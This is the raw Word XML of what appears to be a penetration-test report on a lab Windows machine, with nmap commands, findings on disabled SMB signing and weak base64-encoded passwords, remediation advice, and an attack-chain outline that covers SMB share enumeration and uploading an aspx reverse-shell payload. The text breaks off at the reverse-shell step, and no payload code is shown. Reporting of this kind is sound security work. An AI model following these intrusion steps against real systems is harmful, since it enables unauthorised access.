    <w:p w14:paraId="40018606">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#-sC enables default scripts that check for vulnerabilities/misconfigurations and gives detailed system information on open ports</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53307C77">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#-Pn instructs Nmap to skip pinging and treat the target host as fully online</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6902A95D">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#-vv very verbose ensures that Nmap gives a response each moment instead of waiting for the whole scan to complete</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C61D8E9">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:suppressLineNumbers w:val="0"/>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5272405" cy="6067425"/>
            <wp:effectExtent l="0" t="0" r="444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2405" cy="6067425"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A90CCE1">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:suppressLineNumbers w:val="0"/>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5272405" cy="592455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2405" cy="5924550"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="5082ED1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Under the Host Script results notice that in smb security mode message signing has been disabled and it is dangerous by default.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39CC21A7">
      <w:pPr>
        <w:pStyle w:val="2"/>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Recommendation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B1B4547">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Enable SMB message signing and make it mandatory (set to "Required")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="239A59DB">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Disable NTLM authentication if possible in favor of Kerberos</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C476C72">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Implement network segmentation for critical systems</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27CA4EBA">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Apply the latest SMB security patches from Microsoft</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2ADD794F">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Monitor for SMB relay attacks using network intrusion detection systems</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55DDA9F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Finding 5:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="417FDAE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Title: Weak Account Passwords Allowing Credential Cracking</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31399ADB">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Severity: Medium</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53CBBBC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Description: The user accounts discovered had weak passwords that were easily guessable and did not meet complexity requirements. The passwords were short, used common patterns, and included easily guessable substitutions.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Impact:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E44A2E5">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Attackers can easily guess or brute-force these passwords</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7214F3E3">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Credential stuffing attacks can use these passwords against other services</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01E8BAD1">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Weak passwords enable lateral movement within the network</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0764A53D">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Increases risk of account takeover and data breach</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FA5ACB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Proof of concept:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3552FBC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We found the user credentials in the file passwords.txt and we are able to figure out what exactly they are by decoding.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="681AFCAD">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:suppressLineNumbers w:val="0"/>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>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-144145</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>302895</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="5295900" cy="1181100"/>
                <wp:effectExtent l="6350" t="6350" r="12700" b="12700"/>
                <wp:wrapNone/>
                <wp:docPr id="45" name="Rectangle 45"/>
                <wp:cNvGraphicFramePr/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingShape">
                    <wps:wsp>
                      <wps:cNvSpPr/>
                      <wps:spPr>
                        <a:xfrm>
                          <a:off x="998855" y="4912360"/>
                          <a:ext cx="5295900" cy="118110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5pt;margin-top:23.85pt;height:93pt;width:417pt;z-index:251669504;v-text-anchor:middle;mso-width-relative:page;mso-height-relative:page;" filled="f" stroked="t" coordsize="21600,21600" o:gfxdata="UEsDBAoAAAAAAIdO4kAAAAAAAAAAAAAAAAAEAAAAZHJzL1BLAwQUAAAACACHTuJAmpnHX9oAAAAK&#10;AQAADwAAAGRycy9kb3ducmV2LnhtbE2PsU7DMBCGdyTewTokttZO0pIqjdMhiAGBhCgs3a6xSQKx&#10;HdlOUt6eY4LpdLpP/31/ebiYgc3ah95ZCclaANO2caq3rYT3t4fVDliIaBUOzmoJ3zrAobq+KrFQ&#10;brGvej7GllGIDQVK6GIcC85D02mDYe1Gben24bzBSKtvufK4ULgZeCrEHTfYW/rQ4ajrTjdfx8lI&#10;OG0/+UtfLzg9P94/bWfvRL1xUt7eJGIPLOpL/IPhV5/UoSKns5usCmyQsErTnFAJm5wmAbskyYCd&#10;JaRZlgOvSv6/QvUDUEsDBBQAAAAIAIdO4kBcXjVwaAIAANwEAAAOAAAAZHJzL2Uyb0RvYy54bWyt&#10;VMtu2zAQvBfoPxC8N7JcO7GFyIERI0WBoAmaFj3TFCUR4Ksk/Ui/vkNKSdy0hxzqA73LXc5yR7O8&#10;vDpqRfbCB2lNTcuzCSXCcNtI09X0+7ebDwtKQmSmYcoaUdNHEejV6v27y4OrxNT2VjXCE4CYUB1c&#10;TfsYXVUUgfdCs3BmnTAIttZrFuH6rmg8OwBdq2I6mZwXB+sb5y0XIWB3MwTpiOjfAmjbVnKxsXyn&#10;hYkDqheKRbQUeukCXeXbtq3g8a5tg4hE1RSdxryiCOxtWovVJas6z1wv+XgF9pYrvOpJM2lQ9Blq&#10;wyIjOy//gtKSextsG8+41cXQSGYEXZSTV9w89MyJ3AuoDu6Z9PD/YPmX/b0nsqnpbE6JYRpf/CtY&#10;Y6ZTgmAPBB1cqJD34O796AWYqdtj63X6Rx/kWNPlcrGYA+YRaMty+vF85FccI+GIz6fL+XIC6jky&#10;ynJRlnAAWbwgOR/iJ2E1SUZNPa6SeWX72xCH1KeUVNjYG6kU9lmlDDkAdXqRCzAos4UiUEs7dBdM&#10;RwlTHSTPo8+QwSrZpOPpdPDd9lp5smdJKPk33uyPtFR7w0I/5OVQSmOVlhFToaSu6eL0tDJoLxE4&#10;UJasrW0ewbm3gxiD4zcSsLcsxHvmoT4QhPmMd1haZdGUHS1Keut//Ws/5UMUiFJygJrR8M8d84IS&#10;9dlALstyNkvyz85sfjGF408j29OI2elrCx5KvASOZzPlR/Vktt7qHxjjdaqKEDMctQdqR+c6DlOG&#10;h4CL9TqnQfKOxVvz4HgCHz7gehdtK/O3fWFnJA2iz+oYBzRN1amfs14epd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pnHX9oAAAAKAQAADwAAAAAAAAABACAAAAAiAAAAZHJzL2Rvd25yZXYueG1s&#10;UEsBAhQAFAAAAAgAh07iQFxeNXBoAgAA3AQAAA4AAAAAAAAAAQAgAAAAKQEAAGRycy9lMm9Eb2Mu&#10;eG1sUEsFBgAAAAAGAAYAWQEAAAMGAAAAAA==&#10;">
                <v:fill on="f" focussize="0,0"/>
                <v:stroke weight="1pt" color="#000000 [3213]" miterlimit="8" joinstyle="miter"/>
                <v:imagedata o:title=""/>
                <o:lock v:ext="edit" aspectratio="f"/>
              </v:rect>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>echo "the encoded string" | base64 -d</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06C71EA4">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#echo outputs the string in the quotations at the terminal screen</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C8E5367">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 | pipe symbol simply takes the output from the left side and makes it the input for the right side command</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6763FF5B">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#-d is a flag for decoding</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F7DC260">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:suppressLineNumbers w:val="0"/>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="SimSun" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>W</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="SimSun" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>e can also use the cyberchef application directly from your web browser to easily decode the credentials</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42663D41">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4F9D9816">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:suppressLineNumbers w:val="0"/>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5266690" cy="828675"/>
            <wp:effectExtent l="0" t="0" r="1016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66690" cy="828675"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A80ED12">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:suppressLineNumbers w:val="0"/>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5270500" cy="2963545"/>
            <wp:effectExtent l="0" t="0" r="635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70500" cy="2963545"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B4B9319">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:suppressLineNumbers w:val="0"/>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5271770" cy="2782570"/>
            <wp:effectExtent l="0" t="0" r="5080"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71770" cy="2782570"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="56D462C5">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:suppressLineNumbers w:val="0"/>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="152B0D43">
      <w:pPr>
        <w:pStyle w:val="2"/>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Recommendation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A4D60D7">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Enforce strong password policies - Minimum 12 characters, complexity requirements (uppercase, lowercase, numbers, special characters)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B338254">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Implement password expiration - Require password changes every 60-90 days</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BAC09A8">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Use password managers - Generate and store complex, unique passwords</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FBB1442">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Implement Multi-Factor Authentication (MFA) - Add additional authentication layer</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42236C54">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Block common passwords - Prevent use of common dictionary words and patterns</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7AEB1B4D">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:suppressLineNumbers w:val="0"/>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="59803CB5">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Exploitation Path And Attack Narrative</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D4299A7">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Visual Attack Chain</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E555D21">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Reconnaissance</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="217A1A16">
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="11"/>
        </w:numPr>
        <w:suppressLineNumbers w:val="0"/>
        <w:spacing w:before="0" w:beforeAutospacing="1" w:after="0" w:afterAutospacing="1"/>
        <w:ind w:left="7208" w:hanging="360"/>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="43F0AA99">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Nmap scan: sudo nmap -sV -sC -Pn -vv 10.49.167.173</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="409C3142">
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="11"/>
        </w:numPr>
        <w:suppressLineNumbers w:val="0"/>
        <w:spacing w:before="0" w:beforeAutospacing="1" w:after="0" w:afterAutospacing="1"/>
        <w:ind w:left="7208" w:hanging="360"/>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="240FDA6D">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Found ports:80, 135,139,445,3389, 49663,49666,49667</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17A15DAE">
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="11"/>
        </w:numPr>
        <w:suppressLineNumbers w:val="0"/>
        <w:spacing w:before="0" w:beforeAutospacing="1" w:after="0" w:afterAutospacing="1"/>
        <w:ind w:left="7208" w:hanging="360"/>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="34E93A10">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Port 445 runs SMB Services and is vulnerable if left open</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="726D7D84">
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="11"/>
        </w:numPr>
        <w:suppressLineNumbers w:val="0"/>
        <w:spacing w:before="0" w:beforeAutospacing="1" w:after="0" w:afterAutospacing="1"/>
        <w:ind w:left="7208" w:hanging="360"/>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="35226447">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9979B4B">
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="12"/>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SMB Enumeration</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DD7A6B6">
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="12"/>
        </w:numPr>
        <w:suppressLineNumbers w:val="0"/>
        <w:spacing w:before="0" w:beforeAutospacing="1" w:after="0" w:afterAutospacing="1"/>
        <w:ind w:left="5768" w:hanging="360"/>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="15D26154">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Anonymous SMB access using smbclient</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F3412F4">
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="12"/>
        </w:numPr>
        <w:suppressLineNumbers w:val="0"/>
        <w:spacing w:before="0" w:beforeAutospacing="1" w:after="0" w:afterAutospacing="1"/>
        <w:ind w:left="5768" w:hanging="360"/>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="25D5313D">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Found nt4wrksv as a shared folder</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7702C117">
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="12"/>
        </w:numPr>
        <w:suppressLineNumbers w:val="0"/>
        <w:spacing w:before="0" w:beforeAutospacing="1" w:after="0" w:afterAutospacing="1"/>
        <w:ind w:left="5768" w:hanging="360"/>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4F86BEE8">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85B44CF">
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="13"/>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Getting user credentials</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F114060">
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="13"/>
        </w:numPr>
        <w:suppressLineNumbers w:val="0"/>
        <w:spacing w:before="0" w:beforeAutospacing="1" w:after="0" w:afterAutospacing="1"/>
        <w:ind w:left="5768" w:hanging="360"/>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6A39FA1D">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Downloaded and read passwords.txt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CBD828A">
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="13"/>
        </w:numPr>
        <w:suppressLineNumbers w:val="0"/>
        <w:spacing w:before="0" w:beforeAutospacing="1" w:after="0" w:afterAutospacing="1"/>
        <w:ind w:left="5768" w:hanging="360"/>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="598A99BC">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Decode credentials from base64</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78BE9A3C">
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="13"/>
        </w:numPr>
        <w:suppressLineNumbers w:val="0"/>
        <w:spacing w:before="0" w:beforeAutospacing="1" w:after="0" w:afterAutospacing="1"/>
        <w:ind w:left="5768" w:hanging="360"/>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="348EE4FB">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43FE861">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Reverse Shell payload generation and uploa</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="11"/>
          <w:rFonts w:hint="default" w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>d</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28714492">
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="14"/>
        </w:numPr>
        <w:suppressLineNumbers w:val="0"/>
        <w:spacing w:before="0" w:beforeAutospacing="1" w:after="0" w:afterAutospacing="1"/>
        <w:ind w:left="5768" w:hanging="360"/>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="10109988">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Generate aspx reverse shell payload</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E427665">
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="14"/>
        </w:numPr>
        <w:suppressLineNumbers w:val="0"/>
        <w:spacing w:before="0" w:beforeAutospacing="1" w:after="0" w:afterAutospacing="1"/>
        <w:ind w:left="5768" w:hanging="360"/>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4DC8A3D5">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upload via SMB to nt4wrksv share</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65983F5C">
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="14"/>
        </w:numPr>
        <w:suppressLineNumbers w:val="0"/>
        <w:spacing w:before="0" w:beforeAutospacing="1" w:after="0" w:afterAutospacing="1"/>
        <w:ind w:left="5768" w:hanging="360"/>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0C682259">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46BD843">
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="15"/>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Reverse shell access</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DB3E199">
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:numPr>
